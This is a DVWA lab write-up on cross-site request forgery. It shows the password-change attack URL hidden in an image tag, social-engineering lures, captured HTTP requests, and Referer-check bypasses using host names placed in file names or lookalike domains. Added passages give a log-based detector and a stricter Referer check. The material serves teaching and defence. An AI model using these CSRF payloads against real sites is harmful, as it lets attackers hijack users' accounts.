CSRF
0x01 low
Cross-site request: the new password and its confirmation are written directly into the URL. Share the link with the target; once they click it their password is changed.
Use social engineering to get the target to click a shortened link.
Forge a 404 page whose image tag uses the payload URL as its path. When the target loads the page, the browser automatically requests the crafted link and the target is attacked.
http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
The password-change parameters are visible in the URL.
The target must be logged in to the site for the attack to succeed.
The malicious page is as follows; attempt the attack.
The target visits the page; capture the traffic and observe the packets.
GET /att/tforc.html HTTP/1.1
Host: dvt.dv
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32
Connection: close
First packet: the malicious page is loaded.
GET /learndvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://dvt.dv/att/tforc.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32
Connection: close
Second packet: the browser requests the src value of the img tag, sending the session cookie along with it.
The target's password has been changed; exploitation succeeded.
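The two captures above are what this attack looks like from the server side: a state-changing password update carried entirely in a GET query string, with the session cookie attached automatically. The following detection script is an added example (not part of the original notes or of DVWA) that scans web-server access logs for exactly that pattern. The log lines are constructed to mirror the requests captured above (the IPs, timestamps and combined-log layout with a leading virtual-host field are assumptions); the csrf endpoint path and the password_new/password_conf parameter names are taken from the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (Apache "combined" format prefixed with the virtual host).
# Paths and Referers mirror the captures in the writeup; IPs and timestamps are made up.
SAMPLE_LOG = """\
dvt.dv 10.0.0.5 - - [05/Apr/2024:10:12:00 +0000] "GET /att/tforc.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
dvt.dv 10.0.0.5 - - [05/Apr/2024:10:12:01 +0000] "GET /learndvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change HTTP/1.1" 200 4182 "http://dvt.dv/att/tforc.html" "Mozilla/5.0"
dvt.dv 10.0.0.7 - - [05/Apr/2024:10:15:42 +0000] "GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1" 200 4182 "http://attack.at/" "Mozilla/5.0"
dvt.dv 10.0.0.9 - - [05/Apr/2024:10:16:10 +0000] "GET /learndvwa/vulnerabilities/csrf/ HTTP/1.1" 200 4100 "http://dvt.dv/learndvwa/index.php" "Mozilla/5.0"
"""

# One regex for the assumed log layout: vhost ip ident user [ts] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query parameters that should never travel in a GET: they change account state.
STATE_CHANGING_PARAMS = {"password_new", "password_conf"}


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match the layout."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for a state-changing GET request, else None.

    The finding records whether the Referer host differs from the served vhost.
    A same-host Referer (as in the Low-level demo, where the page was hosted on
    dvt.dv itself) is still reported: the sensitive action over GET is the finding,
    and Referer alone cannot prove the request was intended."""
    if entry["method"] != "GET":
        return None
    parts = urlsplit(entry["target"])
    hit = set(parse_qs(parts.query).keys()) & STATE_CHANGING_PARAMS
    if not hit:
        return None
    ref_host = None
    if entry["referer"] not in ("", "-"):
        ref_host = (urlsplit(entry["referer"]).hostname or "").lower() or None
    cross_site = ref_host is None or ref_host != entry["vhost"].lower()
    return {
        "ip": entry["ip"],
        "ts": entry["ts"],
        "path": parts.path,
        "params": sorted(hit),
        "referer_host": ref_host,
        "cross_site": cross_site,
    }


def scan(log_text):
    """Scan a whole log and return the list of findings in file order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "CROSS-SITE" if f["cross_site"] else "same-host"
        print(f'{f["ts"]} {f["ip"]} GET {f["path"]} params={f["params"]} '
              f'referer={f["referer_host"]} [{flag}]')
```

Running the script reports the two password-change GETs and ignores the plain page load; only the attack.at one is marked cross-site, which is why the real fix is to stop accepting state changes over GET (and to bind them to a per-session token) rather than to rely on the Referer.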
0x02 medium
stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false
A filter is added that inspects the Referer request header. The site's own host name is obtained from $_SERVER['SERVER_NAME']; only if that host appears somewhere in the Referer is the request treated as coming from this host, and only then can the change-password function be used.
Any Referer that merely contains the host value passes. So consider naming the malicious .html file after the target site's host, which slips past the check, or placing the .html file in a directory on the attacker's server whose path contains the target host value.
The image demo at the Low level wasn't ideal: I simply created a folder under the site itself to hold the malicious .html, a situation that could never happen in reality.
Demo: naming the file after the host.
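To make the weakness of the Medium-level check concrete, here is an added example (not DVWA's code, and not part of the original notes) that re-implements the stripos substring test in Python next to a stricter check that parses the Referer and compares its host component exactly. The host dvt.dv and the Referer values are the ones that appear in this writeup; the function names are assumptions.

```python
from urllib.parse import urlsplit

# Assumed value of $_SERVER['SERVER_NAME'] for the lab site in the writeup.
SERVER_NAME = "dvt.dv"


def weak_referer_check(referer, server_name=SERVER_NAME):
    """Mirror DVWA Medium: stripos($referer, $server_name) !== false.

    Any Referer that contains the host string anywhere (path, file name,
    a longer host name) is accepted."""
    if referer is None:
        return False
    return server_name.lower() in referer.lower()


def strict_referer_check(referer, server_name=SERVER_NAME):
    """Parse the Referer as a URL and require its host to equal our host exactly.

    A missing or unparsable Referer is rejected rather than accepted, and only
    http/https schemes count. Superdomain tricks (dvt.dv.attack.at) and
    userinfo tricks (dvt.dv@attack.at) fail because only the parsed host is compared."""
    if not referer:
        return False
    try:
        parts = urlsplit(referer)
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    return host == server_name.lower()


# Referer values taken from the captures in the writeup, plus two constructed variants.
CASES = [
    "http://dvt.dv/att/tforc.html",                       # Low demo: page hosted on the site itself
    "http://attack.at/",                                  # Chrome's origin-only Referer
    "http://attack.at/noSpecialFilderName/dvt.dv.html",   # host name hidden in the file name
    "http://hstnmdvt.dv/",                                # host name hidden in a longer host
    "http://dvt.dv.attack.at/",                           # constructed: our host as a subdomain label
    "http://dvt.dv@attack.at/",                           # constructed: our host as userinfo
    None,                                                 # no Referer at all
]


def compare(cases=CASES):
    """Return (referer, weak_result, strict_result) for each case."""
    return [(r, weak_referer_check(r), strict_referer_check(r)) for r in cases]


if __name__ == "__main__":
    for referer, weak, strict in compare():
        print(f"{str(referer):55} weak={weak!s:5} strict={strict!s:5}")
```

The strict version closes the file-name and host-name bypasses, but a Referer check remains only a secondary measure: browsers may omit or shorten the header depending on referrer policy, as the attack.at capture shows, so the password change should also be moved off GET and tied to a per-session token.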
GET /noSpecialFilderName/dvt.dv.html HTTP/1.1
Host: attack.at
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
If-None-Match: "11a-615565ab38c9e"
If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT
Connection: close
GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
Heh, Google (Chrome) truncates the Referer down to the origin, so the file name never reaches the server.
Modify it manually.
GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
GET /learndvwa/login.php HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
Modify the subsequent packets in the same way.
Didn't quite work, not sure why XD; modern browsers don't send the full Referer like this anymore anyway.
Try a malicious host name instead.
GET /learndvwa/vulnerabilities/csrf/?password_new=att&password_conf=att&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://hstnmdvt.dv/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
This packet changes the password successfully.
This one works too.